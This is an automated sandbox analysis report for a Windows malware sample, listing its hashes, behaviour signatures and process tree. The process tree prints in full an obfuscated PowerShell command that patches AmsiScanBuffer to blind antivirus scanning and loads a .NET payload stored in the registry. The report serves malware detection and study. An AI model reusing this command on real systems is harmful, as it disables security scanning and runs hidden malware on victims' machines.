Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1050s -
max time network
866s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
05/08/2024, 18:07
Static task
static1
Behavioral task
behavioral1
Sample
www.DeadSec0000000000-obfusecator.exe
Resource
win10-20240404-en
General
-
Target
www.DeadSec0000000000-obfusecator.exe
-
Size
164KB
-
MD5
22d120454dd38d7f1a3f1cd0eb497f95
-
SHA1
4c11a082bf8e64b21310b959821a9f7324aa8107
-
SHA256
6fda5bd63e6647c70c7f420b4145898cada9e1a8bff4fca7f6a5859b648d217c
-
SHA512
1552101b7a22082eb69fe3485c53f595055bfc6db01ed14d4abc6f9cb9793e8ca3bc2f2448741fd8b4616f735c9f4f2e0299dc938d264103107fccbe68dc39a9
-
SSDEEP
3072:2QpshPjBCk79JFsCN5dbTA4ZbenYm7MHdcytrkueBuG1/dhRAJiYr:2QpshPjBCuJH5d3fZbeT4KueBu4jRsr
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4900 created 568 4900 powershell.EXE 5 -
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx svchost.exe -
pid Process 4900 powershell.EXE -
Drops file in System32 directory 16 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6D1A73D92C4DC2751A4B5A2404E1BDCC svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 OfficeClickToRun.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83 svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4900 set thread context of 5112 4900 powershell.EXE 76 -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language www.DeadSec0000000000-obfusecator.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1722881370" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={68B30AEA-E7BA-4E60-8A91-D01B9BF16C6E}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4900 powershell.EXE 4900 powershell.EXE 4900 powershell.EXE 4900 powershell.EXE 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe 5112 dllhost.exe -
Suspicious behavior: LoadsDriver 64 IoCs
pid Process 4164 Process not Found 3928 Process not Found 4560 Process not Found 408 Process not Found 604 Process not Found 572 Process not Found 1504 Process not Found 600 Process not Found 412 Process not Found 644 Process not Found 2156 Process not Found 1844 Process not Found 5008 Process not Found 4556 Process not Found 2896 Process not Found 4852 Process not Found 4428 Process not Found 1192 Process not Found 768 Process not Found 3424 Process not Found 1944 Process not Found 504 Process not Found 3488 Process not Found 4136 Process not Found 1508 Process not Found 1336 Process not Found 5012 Process not Found 1200 Process not Found 5036 Process not Found 1112 Process not Found 4832 Process not Found 1196 Process not Found 1104 Process not Found 680 Process not Found 1320 Process not Found 5040 Process not Found 1188 Process not Found 4932 Process not Found 776 Process not Found 5092 Process not Found 784 Process not Found 4496 Process not Found 2100 Process not Found 3888 Process not Found 4100 Process not Found 3984 Process not Found 2920 Process not Found 336 Process not Found 2888 Process not Found 4348 Process not Found 4992 Process not Found 4140 Process not Found 2816 Process not Found 1824 Process not Found 4652 Process not Found 4524 Process not Found 4540 Process not Found 5000 Process not Found 4528 Process not Found 900 Process not Found 4156 Process not Found 5088 Process not Found 4336 Process not Found 908 Process not Found -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 4900 powershell.EXE Token: SeDebugPrivilege 4900 powershell.EXE Token: SeDebugPrivilege 5112 dllhost.exe Token: SeAuditPrivilege 2244 svchost.exe Token: SeAuditPrivilege 2244 svchost.exe Token: SeAuditPrivilege 2244 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4900 wrote to memory of 5112 4900 powershell.EXE 76 PID 4900 wrote to memory of 5112 4900 powershell.EXE 76 PID 4900 wrote to memory of 5112 4900 powershell.EXE 76 PID 4900 wrote to memory of 5112 4900 powershell.EXE 76 PID 4900 wrote to memory of 5112 4900 powershell.EXE 76 PID 4900 wrote to memory of 5112 4900 powershell.EXE 76 PID 4900 wrote to memory of 5112 4900 powershell.EXE 76 PID 4900 wrote to memory of 5112 4900 powershell.EXE 76 PID 5112 wrote to memory of 568 5112 dllhost.exe 5 PID 5112 wrote to memory of 620 5112 dllhost.exe 7 PID 5112 wrote to memory of 704 5112 dllhost.exe 8 PID 5112 wrote to memory of 888 5112 dllhost.exe 13 PID 5112 wrote to memory of 964 5112 dllhost.exe 14 PID 5112 wrote to memory of 328 5112 dllhost.exe 15 PID 5112 wrote to memory of 356 5112 dllhost.exe 16 PID 5112 wrote to memory of 696 5112 dllhost.exe 17 PID 5112 wrote to memory of 1068 5112 dllhost.exe 19 PID 5112 wrote to memory of 1088 5112 dllhost.exe 20 PID 5112 wrote to memory of 1132 5112 dllhost.exe 21 PID 5112 wrote to memory of 1140 5112 dllhost.exe 22 PID 5112 wrote to memory of 1152 5112 dllhost.exe 23 PID 5112 wrote to memory of 1268 5112 dllhost.exe 24 PID 5112 wrote to memory of 1312 5112 dllhost.exe 25 PID 5112 wrote to memory of 1416 5112 dllhost.exe 26 PID 5112 wrote to memory of 1444 5112 dllhost.exe 27 PID 5112 wrote to memory of 1452 5112 dllhost.exe 28 PID 5112 wrote to memory of 1480 5112 dllhost.exe 29 PID 5112 wrote to memory of 1568 5112 dllhost.exe 30 PID 5112 wrote to memory of 1636 5112 dllhost.exe 31 PID 5112 wrote to memory of 1648 5112 dllhost.exe 32 PID 5112 wrote to memory of 1740 5112 dllhost.exe 33 PID 5112 wrote to memory of 1788 5112 dllhost.exe 34 PID 5112 wrote to memory of 1796 5112 dllhost.exe 35 PID 5112 wrote to memory of 1860 5112 dllhost.exe 36 PID 5112 wrote to memory of 1900 5112 dllhost.exe 37 PID 5112 wrote to memory of 1524 5112 dllhost.exe 38 PID 5112 wrote to memory of 2072 5112 dllhost.exe 39 PID 5112 wrote to memory of 2208 5112 dllhost.exe 40 PID 5112 wrote to memory of 2216 5112 dllhost.exe 41 PID 5112 wrote to memory of 2244 5112 dllhost.exe 42 PID 5112 wrote to memory of 2280 5112 dllhost.exe 43 PID 5112 wrote to memory of 2336 5112 dllhost.exe 44 PID 5112 wrote to memory of 2344 5112 dllhost.exe 45 PID 5112 wrote to memory of 2388 5112 dllhost.exe 46 PID 5112 wrote to memory of 2424 5112 dllhost.exe 47 PID 5112 wrote to memory of 2488 5112 dllhost.exe 48 PID 5112 wrote to memory of 2604 5112 dllhost.exe 49 PID 5112 wrote to memory of 2968 5112 dllhost.exe 50 PID 5112 wrote to memory of 2976 5112 dllhost.exe 51 PID 5112 wrote to memory of 2984 5112 dllhost.exe 52 PID 5112 wrote to memory of 2060 5112 dllhost.exe 53 PID 5112 wrote to memory of 3092 5112 dllhost.exe 54 PID 5112 wrote to memory of 3288 5112 dllhost.exe 55 PID 5112 wrote to memory of 3816 5112 dllhost.exe 58 PID 5112 wrote to memory of 3988 5112 dllhost.exe 59 PID 5112 wrote to memory of 4700 5112 dllhost.exe 61 PID 5112 wrote to memory of 3640 5112 dllhost.exe 63 PID 5112 wrote to memory of 3964 5112 dllhost.exe 64 PID 5112 wrote to memory of 2476 5112 dllhost.exe 65 PID 5112 wrote to memory of 4124 5112 dllhost.exe 66 PID 5112 wrote to memory of 3892 5112 dllhost.exe 67 PID 5112 wrote to memory of 5060 5112 dllhost.exe 68 PID 5112 wrote to memory of 4036 5112 dllhost.exe 69 PID 5112 wrote to memory of 4364 5112 dllhost.exe 70
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:568
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:964
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{6c5eff0e-55cd-40bd-a1ae-deff508062d1}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5112
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:620
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵PID:704
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵PID:888
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:328
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:356
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵PID:696
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1068
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵PID:1088
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ImtaWnwVfQKC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$HmbKHKAbTqANra,[Parameter(Position=1)][Type]$TnHEBEYSqM)$ffDGBxVRMEa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+''+'e'+''+'l'+'e'+[Char](103)+''+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'em'+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+'g'+'a'+''+'t'+''+'e'+''+'T'+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+','+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+'S'+'e'+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+'A'+'n'+''+'s'+'i'+'C'+''+'l'+''+'a'+''+'s'+'s'+','+''+[Char](65)+'ut'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$ffDGBxVRMEa.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+'m'+'e,'+'H'+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+'yS'+[Char](105)+''+[Char](103)+','+[Char](80)+'ub'+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$HmbKHKAbTqANra).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+','+[Char](77)+''+'a'+''+[Char](110)+''+'a'+'g'+[Char](101)+''+[Char](100)+'');$ffDGBxVRMEa.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+[Char](111)+''+'k'+''+[Char](101)+'',''+'P'+'u'+'b'+'l'+[Char](105)+''+'c'+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+'S'+''+'i'+''+[Char](103)+''+','+''+'N'+''+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+'l',$TnHEBEYSqM,$HmbKHKAbTqANra).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $ffDGBxVRMEa.CreateType();}$FoCJENRwGvBGq=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+'s'+'tem'+'.'+''+[Char](100)+'ll')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+'i'+'n'+[Char](51)+'2'+[Char](46)+'U'+[Char](110)+'s'+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+'v'+'e'+''+[Char](77)+''+'e'+'t'+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$CrAnXiljMkCtsk=$FoCJENRwGvBGq.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+''+[Char](114)+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('Pu'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+','+'S'+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TPFtWTnUSOkoVzmjUYM=ImtaWnwVfQKC @([String])([IntPtr]);$YNoXgXXzyNqEBuMsMXwQCu=ImtaWnwVfQKC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ouvHnzclJeP=$FoCJENRwGvBGq.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+'o'+'d'+[Char](117)+''+'l'+''+[Char](101)+'H'+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+'3'+'2'+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')));$KGPznECuoTqwNx=$CrAnXiljMkCtsk.Invoke($Null,@([Object]$ouvHnzclJeP,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+''+'r'+'a'+[Char](114)+''+'y'+''+[Char](65)+'')));$WawBSCmXXIapDmhef=$CrAnXiljMkCtsk.Invoke($Null,@([Object]$ouvHnzclJeP,[Object](''+[Char](86)+''+'i'+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+'l'+[Char](80)+'r'+'o'+''+[Char](116)+'ec'+[Char](116)+'')));$qTciFpz=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KGPznECuoTqwNx,$TPFtWTnUSOkoVzmjUYM).Invoke(''+[Char](97)+'ms'+[Char](105)+'.d'+[Char](108)+''+[Char](108)+'');$HvRbRCsMIdrjoRWnf=$CrAnXiljMkCtsk.Invoke($Null,@([Object]$qTciFpz,[Object](''+[Char](65)+''+[Char](109)+'siS'+'c'+''+'a'+'n'+'B'+''+'u'+''+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$ZmfnpTLmEK=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WawBSCmXXIapDmhef,$YNoXgXXzyNqEBuMsMXwQCu).Invoke($HvRbRCsMIdrjoRWnf,[uint32]8,4,[ref]$ZmfnpTLmEK);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$HvRbRCsMIdrjoRWnf,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WawBSCmXXIapDmhef,$YNoXgXXzyNqEBuMsMXwQCu).Invoke($HvRbRCsMIdrjoRWnf,[uint32]8,0x20,[ref]$ZmfnpTLmEK);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'TW'+[Char](65)+''+'R'+'E').GetValue(''+[Char](119)+''+'w'+''+'w'+''+[Char](115)+''+[Char](116)+''+'a'+''+'g'+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4900
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵PID:1132
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1140
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵PID:1152
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵PID:1268
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1312
-
c:\windows\system32\sihost.exesihost.exe2⤵PID:2984
-
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵PID:3456
-
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵PID:4116
-
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵PID:468
-
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵PID:2420
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵PID:1416
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1444
-
